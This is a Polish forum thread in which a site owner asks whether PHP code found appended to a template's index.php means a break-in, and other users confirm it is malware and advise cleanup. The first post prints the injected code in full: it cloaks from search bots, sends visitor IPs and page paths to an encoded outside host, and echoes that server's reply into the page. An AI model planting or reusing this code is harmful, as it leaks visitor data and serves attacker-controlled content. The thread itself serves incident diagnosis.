PDA

Zobacz pełną wersję : Czy to włamanie?



primo
02-05-2012, 00:30
Witam,

Panowie czy to udane włamanie na stronę, co oznacza doklejony kod do kodu strony:



if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zd GF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}


Co ciekawe gdy ten kod jest nie mogę sprawdzić witryny skanerem antywirusowym on-line - gdy usunę, skan idzie.

mboy
02-05-2012, 09:34
może byś łaskawie powiedział w jakim pliku (nazwa) masz ów kod. Ale moim zdaniem tak, coś mi to przypomina, szczególnie że masz tam zakodowany lin : botstatisticupdate[kropka]com/stat/stat[kropka]php - a chyba tego być nie powinno, celowo wstawiłem [kropka]!

primo
02-05-2012, 09:35
może byś łaskawie powiedział w jakim pliku (nazwa) masz ów kod. Ale moim zdaniem tak, coś mi to przypomina, szczególnie że masz tam zakodowany lin : botstatisticupdate[kropka]com/stat/stat[kropka]php - a chyba tego być nie powinno, celowo wstawiłem [kropka]!

Przepraszam za brak precyzji. Ów kod pojawił się w pliku index.php - templatki.

mboy
02-05-2012, 09:35
p.s.
Sugeruje nadpisać zarażony plik - zdrowym, i rozpocząć procedurę jak po ataku hackera, było omawiane wielokrotnie.

primo
02-05-2012, 09:36
p.s.
Sugeruje nadpisać zarażony plik - zdrowym, i rozpocząć procedurę jak po ataku hackera, było omawiane wielokrotnie.

Dziękuję, tak zrobię.

PeFik
02-05-2012, 09:47
Przy okazji, z własnego doświadczenia dodam, że ów złośliwy kod jest/będzie nie tylko w tym jednym pliku, spójrz na mój wpis --> http://blog.elimu.pl/8938-tajemnicze-reklamy-w-joomla-zaskakujace-odkrycie/

primo
02-05-2012, 09:51
PeFik u Ciebie był podobny kod? Wszystkie trzy zainfekowane witryny miały szablon unikalny, bez korzystania tak jak to było w Twoim przypadku z klubowych instalek.

PeFik
02-05-2012, 10:10
Nie pamiętam, czy ów zakodowany link był taki sam, ale tak formuła doklejonego kodu była na oko identyczna. Pamiętam fragment "// This code use for global bot statistic"

ber32
02-05-2012, 17:06
Odkodowany link będzie łatwiej zapamiętać nie podajemy SZKODLIWYCH linków, które znalazły się w kodzie naszej witryny w skutek włamania w postaci aktywnej - usuwam //wojsmol

PeFik
02-05-2012, 21:23
@ber32 - a widziałeś mój post powyżej z właśnie tym adresem, czemu nie czytasz uważnie, jeśli chcesz komuś pomóc?

ber32
02-05-2012, 21:39
Sorki za kłopot.